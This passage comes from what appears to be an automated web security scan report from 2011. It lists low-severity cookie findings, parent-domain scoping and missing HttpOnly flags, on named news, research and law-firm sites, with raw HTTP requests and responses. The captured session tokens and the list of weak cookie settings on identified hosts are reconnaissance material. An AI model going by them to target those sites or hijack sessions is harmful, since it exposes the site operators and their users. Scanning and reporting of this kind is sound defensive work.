Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1766474&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c91dbe765356b43c2af9db971344153a4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Thu, 12 May 2011 15:13:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=357505634DE040F7AAB78C84F4F41453; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Content-Length: 39226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
17.29. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /feeds/ap/2009/05/26/ap6466854.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feeds/ap/2009/05/26/ap6466854.html HTTP/1.1
Host: www.forbes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/1.3.26
Set-Cookie: RMID=adc1d6f34dcc10e0; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.forbes.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
<title>Forbes.com File Not Found</title>
<script language="JavaScript">
var fdcchannel;
var fdcsponsor;
var globalPageType = "errorPage";
var displayedSection = "";
</script>
<d
...[SNIP]...
17.30. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 12 May 2011 16:55:17 GMT
Expires: Thu, 12 May 2011 16:55:17 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
17.31. http://www.linkedin.com/companies/peck-shaffer-&-williams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companies/peck-shaffer-&-williams

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companies/peck-shaffer-&-williams HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Location: http://www.linkedin.com/company/peck-shaffer-&-williams
Set-Cookie: leo_auth_token="GST:Z3_pLgZ4fNVTSZ-1Qa6P7EZHGIwNfftnCfEnXBQCOvy0fADFXyjFND:1305219326:87c7c59b4436917d053ee8f1e1667c94e1926424"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 17:25:25 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:3348664965776292967"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 30-May-2079 20:09:33 GMT; Path=/
Set-Cookie: bcookie="v=1&15140d6c-9c43-417f-bbb6-d47c9cfc2ce3"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 30-May-2079 20:09:33 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Date: Thu, 12 May 2011 16:55:26 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999de45525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 17:26:41 GMT;path=/;httponly
Content-Length: 0

17.32. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
17.33. http://www.nytimes.com/2007/02/09/business/09legal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2007/02/09/business/09legal.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2007/02/09/business/09legal.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:56:02 GMT
Set-cookie: RMID=8a5a625a144d4dcc11228918; expires=Friday, 11-May-2012 16:56:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*2635d=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 61572


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nytimes.com/js/c
...[SNIP]...
17.34. http://www.nytimes.com/2009/01/13/business/13bail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/01/13/business/13bail.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2009/01/13/business/13bail.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:59 GMT
Set-cookie: RMID=d8ee86371f324dcc111f8854; expires=Friday, 11-May-2012 16:55:59 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*2635d=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 68967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.ny
...[SNIP]...
17.35. http://www.nytimes.com/2009/06/19/business/19scrushy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/06/19/business/19scrushy.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2009/06/19/business/19scrushy.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:58 GMT
Set-cookie: RMID=8a5a625a144d4dcc111e8902; expires=Friday, 11-May-2012 16:55:58 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*192f3=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 65875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nyt
...[SNIP]...
17.36. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2010/08/22/sports/cycling/22armstrong.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2010/08/22/sports/cycling/22armstrong.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:57 GMT
Set-cookie: RMID=fa2f606568f14dcc111a74bd; expires=Friday, 11-May-2012 16:55:54 GMT; path=/; domain=.nytimes.com
Content-type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/
...[SNIP]...
18. Cookie without HttpOnly flag set  previous  next
There are 181 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

18.1. http://baxterhall.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://baxterhall.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: baxterhall.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=b99e9c47%2Dd25f%2D494e%2D9dc2%2D4c7b8f84071b; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Set-Cookie: CFTOKEN=0; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10450


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="
...[SNIP]...
18.2. http://layserfreiwald.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://layserfreiwald.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=7d8fe508%2D7e3a%2D406d%2D978b%2Daf2ef35e4854; path=/; expires=Sat, 11-May-2041 02:00:28 GMT
Set-Cookie: CFTOKEN=0; path=/; expires=Sat, 11-May-2041 02:00:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
18.3. http://mail.howardrice.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mail.howardrice.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mail.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/6862
Cookie: __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 302 Object moved
Content-Length: 157
Date: Thu, 12 May 2011 16:13:36 GMT
Location: https://mail.howardrice.com/exchange
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCAQSTDSB=KDOHJDACDNJMDHIHOAGMOCDP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://mail.howardrice.com/exchange">here</a>.</body>
18.4. https://my.gartner.com/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.gartner.com
Path:   /portal/server.pt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/server.pt HTTP/1.1
Host: my.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231879633:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 20:25:35 GMT
Location: https://my.gartner.com/portal/SSOServlet?
Set-Cookie: MY_GARTNER_JSESSIONID=LFB2NMCfl53f2c0p76HT5TP78jMZ7JGb19gP11CbkTjXXLX94GNs!247199090; path=/
Set-Cookie: plloginoccured=false; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
X-PvInfo: [S10203.C10825.A114725.RA0.G5BB6.UCF28D7D9].[OT/html.OG/pages]
Set-Cookie: TSf9d1c9=2eceb1778f7d5a8292d69b6e8f2112fcdf57cbccc2ebf52d4dcc423f; Path=/
Content-Length: 277

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://my.gartner.com/portal/SSOS
...[SNIP]...
18.5. http://www.elfaonline.org/pub/news/indnews/news_report.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.elfaonline.org
Path:   /pub/news/indnews/news_report.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/news/indnews/news_report.cfm HTTP/1.1
Host: www.elfaonline.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 16:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=5678397;expires=Sat, 04-May-2041 16:54:59 GMT;path=/
Set-Cookie: CFTOKEN=79206967;expires=Sat, 04-May-2041 16:54:59 GMT;path=/


                                                       
...[SNIP]...
18.6. http://www.emergingvision.com/our_brands.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.emergingvision.com
Path:   /our_brands.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_brands.html HTTP/1.1
Host: www.emergingvision.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.emergingvision.com%2Four_brands.html&rct=j&q=emerging%20vision%20care&ei=VjbMTZ_xJqbq0QHP8PjtBg&usg=AFQjCNHLvv1piZ_Hk0IxRE60XW6yLc9Wrg&cad=rja

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=a4e72674%2Ddd5c%2D4012%2D8582%2D5a55cde38d57; path=/; expires=Sat, 11-May-2041 03:26:29 GMT
Set-Cookie: CFTOKEN=0; path=/; expires=Sat, 11-May-2041 03:26:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 11115


<html>
<head>
<title>Emerging Vision, Inc. - our brands</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<script language="JavaScript">
<!--
function MM_findO
...[SNIP]...
18.7. http://www.fundingpost.com/breakfast/reg1.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fundingpost.com
Path:   /breakfast/reg1.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /breakfast/reg1.asp HTTP/1.1
Host: www.fundingpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:00 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 31878
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBDRADC=LEEPDOEBCHLNHGEIKICLELCC; path=/
Cache-control: private


<HTML>
<HEAD>
<TITLE>Media and Entertainment Investing Conference on Thursday, Oct 27, 2011 in Miami, FL</TITLE>

<style type="text/css">
#gg3557883 {display: none;}

.photovideo
{
...[SNIP]...
18.8. http://www.gartner.com/technology/home.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/home.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /technology/home.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=JMPMNMQNPkND6BwLywKybhwQqYyByL1L5TyQn9qF7xHvWv1rrsqP!552912517; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:18:53 GMT
ETag: "pv1671ad4401b30608834f24b293b4eb47"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.UE85C916B].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=55f2c2b9d0e93671d1c4f9ed44734e1e7bf81c0d544d5f714dcc40ad; Path=/
Content-Length: 40063

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Technology Resea
...[SNIP]...
18.9. http://www.gartner.com/technology/include/metricsHelper.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/include/metricsHelper.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /technology/include/metricsHelper.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:20 GMT
Content-Length: 283
Set-Cookie: MKTSESSIONID=SQgcNMCQLhFMPSDQQZqLsv11J7m7mThn0vLS2Jj2rDTpkvHlbmPf!552912517; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U8B62F8FE].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=b5965dfa7335f8b0b5b9705f9f5cfd6b7d6266fe3ef18cd74dcc4230; Path=/


var metricsUserClass = "Visitor";
var metricsLoginTxt = "";
var metricsEmailTxt = "";
var metricsCity = "";
var metricsState
...[SNIP]...
18.10. http://www.glaala.org/clubportal/glaala/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.glaala.org
Path:   /clubportal/glaala/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clubportal/glaala/index.cfm HTTP/1.1
Host: www.glaala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522753;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Set-Cookie: CFTOKEN=12f7bbc61c5272e7-E565EA0E-BA1E-6532-B5060418FAD67737;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522753%26CFTOKEN%23%3D12f7bbc61c5272e7%2DE565EA0E%2DBA1E%2D6532%2DB5060418FAD67737%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A12%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A12%27%7D%23hitcount%3D2%23cftoken%3D12f7bbc61c5272e7%2DE565EA0E%2DBA1E%2D6532%2DB5060418FAD67737%23cfid%3D26522753%23;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head>
   <LINK REL="SHORTCUT ICON" HREF="/clubportal/images/clubimages/194/favicon.ico">
   <title>
   legal administrator, ala, GLA, los angeles -
   </title>
   
   
           <meta name="keyw
...[SNIP]...
18.11. http://www.goclubexe.com/clubportal/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.goclubexe.com
Path:   /clubportal/

Issue detail

